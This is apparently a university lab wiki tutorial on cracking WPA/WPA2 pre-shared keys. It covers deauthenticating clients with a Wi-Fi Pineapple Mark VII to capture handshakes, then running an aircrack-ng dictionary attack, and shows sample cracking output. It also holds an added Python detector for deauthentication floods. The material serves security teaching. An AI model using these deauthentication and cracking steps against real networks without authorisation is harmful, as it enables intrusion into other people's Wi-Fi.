WiFI Pineapple Mark VII: Cracking WPA/WPA2-PSK with a dictionary/brute-force attack

From Embedded Lab Vienna for IoT & Security
Revision as of 18:38, 23 January 2022 by KBeboso (talk | contribs)

Summary

This documentation is a guide to recovering a WPA2-PSK password with the Wi-Fi Pineapple Mark VII combined with the Linux tool aircrack-ng. The Wi-Fi Pineapple Mark VII is used to deauthenticate the clients of the victim's Wi-Fi. At the same time, it captures the 4-way handshake between client and access point and saves it as a PCAP or Hashcat file. This guide uses Linux to demonstrate aircrack-ng.

Requirements

Mandatory

GNU/Linux

  • Install the aircrack-ng suite: sudo apt install aircrack-ng

To complete these steps, you must have followed WiFI Pineapple Mark VII: Initial Setup first.

Optional

Hashcat

Description

Step 1

This step describes how to capture the handshake by deauthenticating the clients from their access point.

  • Log in to the Wi-Fi Pineapple web GUI and open the Recon tab
  • As seen in figure "WiFI Pineapple Web GUI", scan your environment for the victim's Wi-Fi (1).
  • Choose the victim's Wi-Fi and select "Capture WPA Handshake" (4)
  • Start the deauthentication attack (3)
  • Once a handshake has been captured, it can then be downloaded
[Figure: WiFI Pineapple Web GUI]
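The deauthentication in Step 1 leaves a distinctive trace on the air: a burst of deauth/disassoc management frames sourced from the access point's BSSID. As an added, defender-side example (not part of the original page and not code from the Wi-Fi Pineapple or aircrack-ng projects), the Python below parses raw 802.11 management headers and flags any BSSID that sends such a burst inside a sliding time window, which is the check a wireless IDS would perform. It assumes the radiotap header has already been stripped and that each frame carries a timestamp in seconds; the MAC addresses, frames and threshold are constructed.

```python
# Added example (not from the original page): flag deauthentication /
# disassociation bursts in raw 802.11 management frames. Assumes
# radiotap/PRISM headers are stripped; all sample frames are constructed.
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0xC, 0xA   # 802.11 management-frame subtypes (type 0)

def parse_mgmt_header(frame: bytes):
    """Return (subtype, addr1, addr2, bssid) for a management frame, else None."""
    if len(frame) < 24:                      # FC + Duration + 3 addresses + SeqCtl
        return None
    fc = struct.unpack("<H", frame[:2])[0]   # frame control, little-endian
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0:                           # not a management frame
        return None
    mac = lambda b: ":".join(f"{x:02X}" for x in b)
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22])

def find_deauth_bursts(frames, window=1.0, threshold=5):
    """frames: iterable of (timestamp_s, raw_frame). Returns {bssid: peak_count}
    for BSSIDs sourcing >= threshold deauth/disassoc frames in any `window` s."""
    stamps = defaultdict(list)
    for ts, raw in frames:
        hdr = parse_mgmt_header(raw)
        if hdr and hdr[0] in (DEAUTH, DISASSOC):
            stamps[hdr[3]].append(ts)       # key on BSSID (addr3)
    alerts = {}
    for bssid, ts_list in stamps.items():
        ts_list.sort()
        start = 0
        for end, ts in enumerate(ts_list):
            while ts - ts_list[start] > window:   # slide window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts[bssid] = max(alerts.get(bssid, 0), end - start + 1)
    return alerts

def make_test_frame(subtype, dst_hex, src_hex, bssid_hex, reason=7):
    """Constructed test fixture: minimal management frame plus a reason code."""
    fc = struct.pack("<H", subtype << 4)     # type 0 (management) + subtype
    addrs = bytes.fromhex(dst_hex + src_hex + bssid_hex)
    return fc + b"\x00\x00" + addrs + b"\x00\x00" + struct.pack("<H", reason)

AP, STA, BCAST = "00146C7E4080", "A4B1C2D3E4F5", "FFFFFFFFFFFF"   # constructed
SAMPLE = [(i * 0.1, make_test_frame(DEAUTH, BCAST, AP, AP)) for i in range(8)]  # flood
SAMPLE += [(5.0, make_test_frame(DEAUTH, STA, AP, AP)),      # one ordinary deauth
           (6.0, make_test_frame(0x8, BCAST, AP, AP))]       # beacon, ignored
```

Running find_deauth_bursts(SAMPLE) reports the constructed access point with a peak of 8 frames in one window, while the single ordinary deauth and the beacon produce no alert.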

Step 2

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To accomplish this, you need a dictionary of words as input. aircrack-ng takes each word in turn and tests whether it is, in fact, the pre-shared key.

Open a console session in Linux and enter:

aircrack-ng -w rockyou.txt -b 00:14:6C:7E:40:80 *.cap

Where:

-w rockyou.txt[1] is the name of the dictionary file. Remember to specify the full path if the file is not located in the current directory. Note: any word list can be used for this attack. If the password you are looking for does not appear in the list, the attack fails.

-b 00:14:6C:7E:40:80 is the BSSID (MAC address) of the target access point; it restricts aircrack-ng to that network's handshake.

*.cap is the file containing the captured packets of the handshake.

Here is typical output when no handshake is found:

Opening psk-04.cap
Read 1827 packets.
No valid WPA handshakes found.

When this happens, you either have to redo Step 1 (deauthenticating the wireless client) or wait longer if you are using the passive approach. With the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

Opening psk-04.cap
Read 1827 packets.

#  BSSID              ESSID                     Encryption
1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)

Choosing first network as target.

At this point, aircrack-ng starts attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this can take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

                              Aircrack-ng 0.8


                [00:00:00] 2 keys tested (37.20 k/s)


                        KEY FOUND! [ 12345678 ]


   Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                    B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 

   Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                    CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                    FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                    2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 

   EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

Used Hardware

WiFi Pineapple Mark VII

Courses

References